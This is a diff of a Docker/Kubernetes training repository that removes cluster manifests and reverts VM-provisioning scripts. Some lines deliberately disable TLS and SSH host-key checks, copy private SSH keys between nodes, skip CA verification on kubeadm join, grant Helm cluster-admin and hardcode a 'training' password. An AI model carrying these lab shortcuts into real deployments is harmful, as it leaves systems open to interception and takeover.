-            name: local-path-config
----
-apiVersion: storage.k8s.io/v1
-kind: StorageClass
-metadata:
-  name: local-path
-provisioner: rancher.io/local-path
-volumeBindingMode: WaitForFirstConsumer
-reclaimPolicy: Delete
----
-kind: ConfigMap
-apiVersion: v1
-metadata:
-  name: local-path-config
-  namespace: local-path-storage
-data:
-  config.json: |-
-        {
-                "nodePathMap":[
-                {
-                        "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
-                        "paths":["/opt/local-path-provisioner"]
-                }
-                ]
-        }
-

k8s/metrics-server.yaml

@@ -1,138 +0,0 @@
-kind: ClusterRole
-apiVersion: rbac.authorization.k8s.io/v1
-metadata:
-  name: system:aggregated-metrics-reader
-  labels:
-    rbac.authorization.k8s.io/aggregate-to-view: "true"
-    rbac.authorization.k8s.io/aggregate-to-edit: "true"
-    rbac.authorization.k8s.io/aggregate-to-admin: "true"
-rules:
-- apiGroups: ["metrics.k8s.io"]
-  resources: ["pods"]
-  verbs: ["get", "list", "watch"]
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: ClusterRoleBinding
-metadata:
-  name: metrics-server:system:auth-delegator
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: system:auth-delegator
-subjects:
-- kind: ServiceAccount
-  name: metrics-server
-  namespace: kube-system
----
-apiVersion: rbac.authorization.k8s.io/v1beta1
-kind: RoleBinding
-metadata:
-  name: metrics-server-auth-reader
-  namespace: kube-system
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: Role
-  name: extension-apiserver-authentication-reader
-subjects:
-- kind: ServiceAccount
-  name: metrics-server
-  namespace: kube-system
----
-apiVersion: apiregistration.k8s.io/v1beta1
-kind: APIService
-metadata:
-  name: v1beta1.metrics.k8s.io
-spec:
-  service:
-    name: metrics-server
-    namespace: kube-system
-  group: metrics.k8s.io
-  version: v1beta1
-  insecureSkipTLSVerify: true
-  groupPriorityMinimum: 100
-  versionPriority: 100
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: metrics-server
-  namespace: kube-system
----
-apiVersion: extensions/v1beta1
-kind: Deployment
-metadata:
-  name: metrics-server
-  namespace: kube-system
-  labels:
-    k8s-app: metrics-server
-spec:
-  selector:
-    matchLabels:
-      k8s-app: metrics-server
-  template:
-    metadata:
-      name: metrics-server
-      labels:
-        k8s-app: metrics-server
-    spec:
-      serviceAccountName: metrics-server
-      volumes:
-      # mount in tmp so we can safely use from-scratch images and/or read-only containers
-      - name: tmp-dir
-        emptyDir: {}
-      containers:
-      - name: metrics-server
-        image: k8s.gcr.io/metrics-server-amd64:v0.3.1
-        imagePullPolicy: Always
-        volumeMounts:
-        - name: tmp-dir
-          mountPath: /tmp
-        args:
-        - --kubelet-preferred-address-types=InternalIP
-        - --kubelet-insecure-tls
-        - --metric-resolution=5s
-
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: metrics-server
-  namespace: kube-system
-  labels:
-    kubernetes.io/name: "Metrics-server"
-spec:
-  selector:
-    k8s-app: metrics-server
-  ports:
-  - port: 443
-    protocol: TCP
-    targetPort: 443
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: system:metrics-server
-rules:
-- apiGroups:
-  - ""
-  resources:
-  - pods
-  - nodes
-  - nodes/stats
-  verbs:
-  - get
-  - list
-  - watch
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRoleBinding
-metadata:
-  name: system:metrics-server
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: system:metrics-server
-subjects:
-- kind: ServiceAccount
-  name: metrics-server
-  namespace: kube-system

k8s/persistent-consul.yaml

@@ -1,95 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: consul
-rules:
-  - apiGroups: [ "" ]
-    resources: [ pods ]
-    verbs:     [ get, list ]
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: consul
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: Role
-  name: consul
-subjects:
-  - kind: ServiceAccount
-    name: consul
-    namespace: orange
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: consul
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: consul
-spec:
-  ports:
-  - port: 8500
-    name: http
-  selector:
-    app: consul
----
-apiVersion: apps/v1
-kind: StatefulSet
-metadata:
-  name: consul
-spec:
-  serviceName: consul
-  replicas: 3
-  selector:
-    matchLabels:
-      app: consul
-  volumeClaimTemplates:
-    - metadata:
-        name: data
-      spec:
-        accessModes:
-          - ReadWriteOnce
-        resources:
-          requests:
-            storage: 1Gi
-  template:
-    metadata:
-      labels:
-        app: consul
-    spec:
-      serviceAccountName: consul
-      affinity:
-        podAntiAffinity:
-          requiredDuringSchedulingIgnoredDuringExecution:
-            - labelSelector:
-                matchExpressions:
-                  - key: app
-                    operator: In
-                    values:
-                      - consul
-              topologyKey: kubernetes.io/hostname
-      terminationGracePeriodSeconds: 10
-      containers:
-        - name: consul
-          image: "consul:1.4.4"
-          volumeMounts:
-            - name: data
-              mountPath: /consul/data
-          args:
-            - "agent"
-            - "-bootstrap-expect=3"
-            - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
-            - "-client=0.0.0.0"
-            - "-data-dir=/consul/data"
-            - "-server"
-            - "-ui"
-          lifecycle:
-            preStop:
-              exec:
-                command:
-                - /bin/sh
-                - -c
-                - consul leave

k8s/psp-privileged.yaml

@@ -1,39 +0,0 @@
----
-apiVersion: policy/v1beta1
-kind: PodSecurityPolicy
-metadata:
-  name: privileged
-  annotations:
-    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
-spec:
-  privileged: true
-  allowPrivilegeEscalation: true
-  allowedCapabilities:
-  - '*'
-  volumes:
-  - '*'
-  hostNetwork: true
-  hostPorts:
-  - min: 0
-    max: 65535
-  hostIPC: true
-  hostPID: true
-  runAsUser:
-    rule: 'RunAsAny'
-  seLinux:
-    rule: 'RunAsAny'
-  supplementalGroups:
-    rule: 'RunAsAny'
-  fsGroup:
-    rule: 'RunAsAny'
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: psp:privileged
-rules:
-- apiGroups:     ['policy']
-  resources:     ['podsecuritypolicies']
-  verbs:         ['use']
-  resourceNames: ['privileged']
-

k8s/psp-restricted.yaml

@@ -1,38 +0,0 @@
----
-apiVersion: extensions/v1beta1
-kind: PodSecurityPolicy
-metadata:
-  annotations:
-    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
-    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
-    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
-    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
-  name: restricted
-spec:
-  allowPrivilegeEscalation: false
-  fsGroup:
-    rule: RunAsAny
-  runAsUser:
-    rule: RunAsAny
-  seLinux:
-    rule: RunAsAny
-  supplementalGroups:
-    rule: RunAsAny
-  volumes:
-  - configMap
-  - emptyDir
-  - projected
-  - secret
-  - downwardAPI
-  - persistentVolumeClaim
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: psp:restricted
-rules:
-- apiGroups:     ['policy']
-  resources:     ['podsecuritypolicies']
-  verbs:         ['use']
-  resourceNames: ['restricted']
-

k8s/users:jean.doe.yaml

@@ -1,33 +0,0 @@
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: jean.doe
-  namespace: users
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: users:jean.doe
-rules:
-- apiGroups: [ certificates.k8s.io ]
-  resources: [ certificatesigningrequests ]
-  verbs:     [ create ]
-- apiGroups:     [ certificates.k8s.io ]
-  resourceNames: [ users:jean.doe ]
-  resources:     [ certificatesigningrequests ]
-  verbs:         [ get, create, delete, watch ]
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRoleBinding
-metadata:
-  name: users:jean.doe
-roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: users:jean.doe
-subjects:
-- kind: ServiceAccount
-  name: jean.doe
-  namespace: users
-

k8s/volumes-for-consul.yaml

@@ -1,70 +0,0 @@
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node2
-  annotations:
-    node: node2
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node2
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node3
-  annotations:
-    node: node3
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node3
----
-apiVersion: v1
-kind: PersistentVolume
-metadata:
-  name: consul-node4
-  annotations:
-    node: node4
-spec:
-  capacity:
-    storage: 10Gi
-  accessModes:
-  - ReadWriteOnce
-  persistentVolumeReclaimPolicy: Delete
-  local:
-    path: /mnt/consul
-  nodeAffinity:
-    required:
-      nodeSelectorTerms:
-      - matchExpressions:
-        - key: kubernetes.io/hostname
-          operator: In
-          values:
-          - node4
-

prepare-local/README.md

@@ -32,7 +32,7 @@ Virtualbox, Vagrant and Ansible
 
           $ source path/to/your-ansible-clone/hacking/env-setup
 
-  - you need to repeat the last step every time you open a new terminal session
+  - you need to repeat the last step everytime you open a new terminal session
     and want to use any Ansible command (but you'll probably only need to run
     it once).
 

prepare-vms/lib/cli.sh

@@ -54,9 +54,6 @@ need_infra() {
     if [ -z "$1" ]; then
         die "Please specify infrastructure file. (e.g.: infra/aws)"
     fi
-    if [ "$1" = "--infra" ]; then
-        die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
-    fi
     if [ ! -f "$1" ]; then
         die "Infrastructure file $1 doesn't exist."
     fi

prepare-vms/lib/commands.sh

@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text
 
 HELP=""
 _cmd() {
-    HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
+    HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
 }
 
 _cmd help "Show available commands"
@@ -74,10 +74,10 @@ _cmd_deploy() {
     pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
     pssh sudo chmod +x /usr/local/bin/docker-prompt
 
-    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
+    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
     pssh "
     sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
-    ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
+    ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
     sudo -u docker tar -C /home/docker -xf-"
 
     # if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,11 +86,11 @@ _cmd_deploy() {
     cat /home/docker/.ssh/id_rsa.pub |
     sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
 
-    # On the first node, create and deploy TLS certs using Docker Machine
+    # On node1, create and deploy TLS certs using Docker Machine
     # (Currently disabled.)
     true || pssh "
-    if i_am_first_node; then
-        grep '[0-9]\$' /etc/hosts |
+    if grep -q node1 /tmp/node; then
+        grep ' node' /etc/hosts | 
         xargs -n2 sudo -H -u docker \
         docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
     fi"
@@ -103,62 +103,11 @@ _cmd_deploy() {
     info "$0 cards $TAG"
 }
 
-_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
-_cmd_disabledocker() {
-    TAG=$1
-    need_tag
-
-    pssh "sudo systemctl disable docker.service"
-    pssh "sudo systemctl disable docker.socket"
-    pssh "sudo systemctl stop docker"
-}
-
-_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
-_cmd_kubebins() {
-    TAG=$1
-    need_tag
-
-    pssh --timeout 300 "
-    set -e
-    cd /usr/local/bin
-    if ! [ -x etcd ]; then
-        curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
-        | sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
-    fi
-    if ! [ -x hyperkube ]; then
-        curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
-        | sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
-    fi
-    if ! [ -x kubelet ]; then
-        for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
-        do
-            sudo ln -s hyperkube \$BINARY
-        done
-    fi
-    sudo mkdir -p /opt/cni/bin
-    cd /opt/cni/bin
-    if ! [ -x bridge ]; then
-        curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
-        | sudo tar -zx
-    fi
-    "
-}
-
 _cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
 _cmd_kube() {
     TAG=$1
     need_tag
 
-    # Optional version, e.g. 1.13.5
-    KUBEVERSION=$2
-    if [ "$KUBEVERSION" ]; then
-        EXTRA_KUBELET="=$KUBEVERSION-00"
-        EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
-    else
-        EXTRA_KUBELET=""
-        EXTRA_KUBEADM=""
-    fi
-
     # Install packages
     pssh --timeout 200 "
     curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -167,19 +116,21 @@ _cmd_kube() {
     sudo tee /etc/apt/sources.list.d/kubernetes.list"
     pssh --timeout 200 "
     sudo apt-get update -q &&
-    sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
+    sudo apt-get install -qy kubelet kubeadm kubectl &&
     kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
 
     # Initialize kube master
     pssh --timeout 200 "
-    if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
+    if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
         kubeadm token generate > /tmp/token &&
-	sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
+	sudo kubeadm init \
+             --token \$(cat /tmp/token) \
+             --ignore-preflight-errors=SystemVerification
     fi"
 
     # Put kubeconfig in ubuntu's and docker's accounts
     pssh "
-    if i_am_first_node; then
+    if grep -q node1 /tmp/node; then
         sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
         sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
         sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -189,23 +140,19 @@ _cmd_kube() {
 
     # Install weave as the pod network
     pssh "
-    if i_am_first_node; then
+    if grep -q node1 /tmp/node; then
         kubever=\$(kubectl version | base64 | tr -d '\n') &&
         kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
     fi"
 
     # Join the other nodes to the cluster
     pssh --timeout 200 "
-    if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
-        FIRSTNODE=\$(cat /etc/name_of_first_node) &&
-        TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
-        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
-    fi"
-
-    # Install metrics server
-    pssh "
-    if i_am_first_node; then
-	kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
+    if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
+        TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
+        sudo kubeadm join \
+             --discovery-token-unsafe-skip-ca-verification \
+             --ignore-preflight-errors=SystemVerification \
+             --token \$TOKEN node1:6443
     fi"
 
     # Install kubectx and kubens
@@ -229,7 +176,7 @@ EOF"
     pssh "
     if [ ! -x /usr/local/bin/stern ]; then
         ##VERSION##
-        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
+        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
         sudo chmod +x /usr/local/bin/stern &&
         stern --completion bash | sudo tee /etc/bash_completion.d/stern
     fi"
@@ -241,21 +188,6 @@ EOF"
         helm completion bash | sudo tee /etc/bash_completion.d/helm
     fi"
 
-    # Install ship
-    pssh "
-    if [ ! -x /usr/local/bin/ship ]; then
-        curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
-             sudo tar -C /usr/local/bin -zx ship
-    fi"
-
-    # Install the AWS IAM authenticator
-    pssh "
-    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
-	##VERSION##
-        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
-	sudo chmod +x /usr/local/bin/aws-iam-authenticator
-    fi"
-
     sep "Done"
 }
 
@@ -276,9 +208,10 @@ _cmd_kubetest() {
     # Feel free to make that better ♥
     pssh "
     set -e
-    if i_am_first_node; then
+    [ -f /tmp/node ]
+    if grep -q node1 /tmp/node; then
       which kubectl
-      for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
+      for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
         echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
       done
     fi"
@@ -318,14 +251,6 @@ _cmd_listall() {
     done
 }
 
-_cmd ping "Ping VMs in a given tag, to check that they have network access"
-_cmd_ping() {
-    TAG=$1
-    need_tag
-
-    fping < tags/$TAG/ips.txt
-}
-
 _cmd netfix "Disable GRO and run a pinger job on the VMs"
 _cmd_netfix () {
     TAG=$1
@@ -357,14 +282,6 @@ _cmd_opensg() {
     infra_opensg
 }
 
-_cmd disableaddrchecks "Disable source/destination IP address checks"
-_cmd_disableaddrchecks() {
-    TAG=$1
-    need_tag
-
-    infra_disableaddrchecks
-}
-
 _cmd pssh "Run an arbitrary command on all nodes"
 _cmd_pssh() {
     TAG=$1
@@ -399,15 +316,6 @@ _cmd_retag() {
     aws_tag_instances $OLDTAG $NEWTAG
 }
 
-_cmd ssh "Open an SSH session to the first node of a tag"
-_cmd_ssh() {
-    TAG=$1
-    need_tag
-    IP=$(head -1 tags/$TAG/ips.txt)
-    info "Logging into $IP"
-    ssh docker@$IP
-}
-
 _cmd start "Start a group of VMs"
 _cmd_start() {
     while [ ! -z "$*" ]; do
@@ -419,7 +327,7 @@ _cmd_start() {
         *) die "Unrecognized parameter: $1."
         esac
     done
-
+    
     if [ -z "$INFRA" ]; then
         die "Please add --infra flag to specify which infrastructure file to use."
     fi
@@ -430,8 +338,8 @@ _cmd_start() {
         COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
         warning "No --count option was specified. Using value from settings file ($COUNT)."
     fi
-
-    # Check that the specified settings and infrastructure are valid.
+    
+    # Check that the specified settings and infrastructure are valid.        
     need_settings $SETTINGS
     need_infra $INFRA
 
@@ -503,15 +411,15 @@ _cmd_helmprom() {
     TAG=$1
     need_tag
     pssh "
-    if i_am_first_node; then
+    if grep -q node1 /tmp/node; then
         kubectl -n kube-system get serviceaccount helm ||
             kubectl -n kube-system create serviceaccount helm
-        sudo -u docker -H helm init --service-account helm
+        helm init --service-account helm
         kubectl get clusterrolebinding helm-can-do-everything ||
             kubectl create clusterrolebinding helm-can-do-everything \
                 --clusterrole=cluster-admin \
                 --serviceaccount=kube-system:helm
-        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
+        helm upgrade --install prometheus stable/prometheus \
             --namespace kube-system \
             --set server.service.type=NodePort \
             --set server.service.nodePort=30090 \
@@ -536,38 +444,6 @@ _cmd_weavetest() {
     sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
 }
 
-_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
-_cmd_webssh() {
-    TAG=$1
-    need_tag
-    pssh "
-    sudo apt-get update &&
-    sudo apt-get install python-tornado python-paramiko -y"
-    pssh "
-    [ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
-    pssh "
-    for KEYFILE in /etc/ssh/*.pub; do
-      read a b c < \$KEYFILE; echo localhost \$a \$b
-    done > webssh/known_hosts"
-    pssh "cat >webssh.service <<EOF
-[Unit]
-Description=webssh
-
-[Install]
-WantedBy=multi-user.target
-
-[Service]
-WorkingDirectory=/home/ubuntu/webssh
-ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
-User=nobody
-Group=nogroup
-Restart=always
-EOF"
-    pssh "
-    sudo systemctl enable \$PWD/webssh.service &&
-    sudo systemctl start webssh.service"
-}
-
 greet() {
     IAMUSER=$(aws iam get-user --query 'User.UserName')
     info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
@@ -625,8 +501,8 @@ test_vm() {
     for cmd in "hostname" \
         "whoami" \
         "hostname -i" \
-        "ls -l /usr/local/bin/i_am_first_node" \
-        "grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
+        "cat /tmp/node" \
+        "cat /tmp/ipv4" \
         "cat /etc/hosts" \
         "hostnamectl status" \
         "docker version | grep Version -B1" \

prepare-vms/lib/infra.sh

@@ -24,7 +24,3 @@ infra_quotas() {
 infra_opensg() {
 	warning "infra_opensg is unsupported on $INFRACLASS."
 }
-
-infra_disableaddrchecks() {
-	warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
-}

prepare-vms/lib/infra/aws.sh

@@ -31,7 +31,6 @@ infra_start() {
         die "I could not find which AMI to use in this region. Try another region?"
     fi
     AWS_KEY_NAME=$(make_key_name)
-    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
 
     sep "Starting instances"
     info "         Count: $COUNT"
@@ -39,11 +38,10 @@ infra_start() {
     info "     Token/tag: $TAG"
     info "           AMI: $AMI"
     info "      Key name: $AWS_KEY_NAME"
-    info " Instance type: $AWS_INSTANCE_TYPE"
     result=$(aws ec2 run-instances \
         --key-name $AWS_KEY_NAME \
         --count $COUNT \
-        --instance-type $AWS_INSTANCE_TYPE \
+        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
         --client-token $TAG \
         --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
         --image-id $AMI)
@@ -90,16 +88,8 @@ infra_opensg() {
         --cidr 0.0.0.0/0
 }
 
-infra_disableaddrchecks() {
-    IDS=$(aws_get_instance_ids_by_tag $TAG)
-    for ID in $IDS; do
-        info "Disabling source/destination IP checks on: $ID"
-        aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
-    done
-}
-
 wait_until_tag_is_running() {
-    max_retry=100
+    max_retry=50
     i=0
     done_count=0
     while [[ $done_count -lt $COUNT ]]; do

prepare-vms/lib/ips-txt-to-html.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python3
+#!/usr/bin/env python
 import os
 import sys
 import yaml

prepare-vms/lib/postprep.py

@@ -12,7 +12,6 @@ config = yaml.load(open("/tmp/settings.yaml"))
 COMPOSE_VERSION = config["compose_version"]
 MACHINE_VERSION = config["machine_version"]
 CLUSTER_SIZE = config["clustersize"]
-CLUSTER_PREFIX = config["clusterprefix"]
 ENGINE_VERSION = config["engine_version"]
 DOCKER_USER_PASSWORD = config["docker_user_password"]
 
@@ -122,7 +121,7 @@ addresses = list(l.strip() for l in sys.stdin)
 assert ipv4 in addresses
 
 def makenames(addrs):
-    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
+    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
 
 while addresses:
     cluster = addresses[:CLUSTER_SIZE]
@@ -136,21 +135,15 @@ while addresses:
     print(cluster)
 
     mynode = cluster.index(ipv4) + 1
-    system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
-    system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
+    system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
+    system("echo node{} | sudo tee /etc/hostname".format(mynode))
+    system("sudo hostname node{}".format(mynode))
     system("sudo -u docker mkdir -p /home/docker/.ssh")
     system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
 
-    # Create a convenience file to easily check if we're the first node
     if ipv4 == cluster[0]:
-        system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
-        # On the first node, if we don't have a private key, generate one (with empty passphrase)
+        # If I'm node1 and don't have a private key, generate one (with empty passphrase)
         system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
-    else:
-        system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
-    # Record the IPV4 and name of the first node
-    system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
-    system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
 
 FINISH = time.time()
 duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

prepare-vms/settings/admin-dmuc.yaml

@@ -1,28 +0,0 @@
-# Number of VMs per cluster
-clustersize: 1
-
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: dmuc
-
-# Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
-
-# Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
-
-# Feel free to reduce this if your printer can handle it
-paper_margin: 0.2in
-
-# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
-# If you print (or generate a PDF) using ips.html, they will be ignored.
-# (The equivalent parameters must be set from the browser's print dialog.)
-
-# This can be "test" or "stable"
-engine_version: stable
-
-# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
-machine_version: 0.14.0
-
-# Password used to connect with the "docker user"
-docker_user_password: training

prepare-vms/settings/admin-kubenet.yaml

@@ -1,28 +0,0 @@
-# Number of VMs per cluster
-clustersize: 3
-
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: kubenet
-
-# Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
-
-# Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
-
-# Feel free to reduce this if your printer can handle it
-paper_margin: 0.2in
-
-# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
-# If you print (or generate a PDF) using ips.html, they will be ignored.
-# (The equivalent parameters must be set from the browser's print dialog.)
-
-# This can be "test" or "stable"
-engine_version: stable
-
-# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
-machine_version: 0.14.0
-
-# Password used to connect with the "docker user"
-docker_user_password: training

prepare-vms/settings/admin-kuberouter.yaml

@@ -1,28 +0,0 @@
-# Number of VMs per cluster
-clustersize: 3
-
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: kuberouter
-
-# Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
-
-# Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
-
-# Feel free to reduce this if your printer can handle it
-paper_margin: 0.2in
-
-# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
-# If you print (or generate a PDF) using ips.html, they will be ignored.
-# (The equivalent parameters must be set from the browser's print dialog.)
-
-# This can be "test" or "stable"
-engine_version: stable
-
-# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
-machine_version: 0.14.0
-
-# Password used to connect with the "docker user"
-docker_user_password: training

prepare-vms/settings/csv.yaml

@@ -1,8 +1,5 @@
 # Number of VMs per cluster
 clustersize: 5
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: clusters.csv

prepare-vms/settings/enix.yaml

@@ -1,11 +1,8 @@
 # Number of VMs per cluster
-clustersize: 3
-
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: test
+clustersize: 5
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: enix.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -21,7 +18,7 @@ paper_margin: 0.2in
 engine_version: stable
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.22.0
 machine_version: 0.14.0
 
 # Password used to connect with the "docker user"

prepare-vms/settings/example.yaml

@@ -3,9 +3,6 @@
 # Number of VMs per cluster
 clustersize: 5
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html
 
@@ -23,7 +20,7 @@ paper_margin: 0.2in
 engine_version: test
 
 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.24.1
+compose_version: 1.18.0
 machine_version: 0.13.0
 
 # Password used to connect with the "docker user"

prepare-vms/settings/fundamentals.yaml

@@ -3,9 +3,6 @@
 # Number of VMs per cluster
 clustersize: 1
 
-# The hostname of each node will be clusterprefix + a number
-clusterprefix: node
-
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html
 
@@ -23,7 +20,7 @@ paper_margin: 0.2in
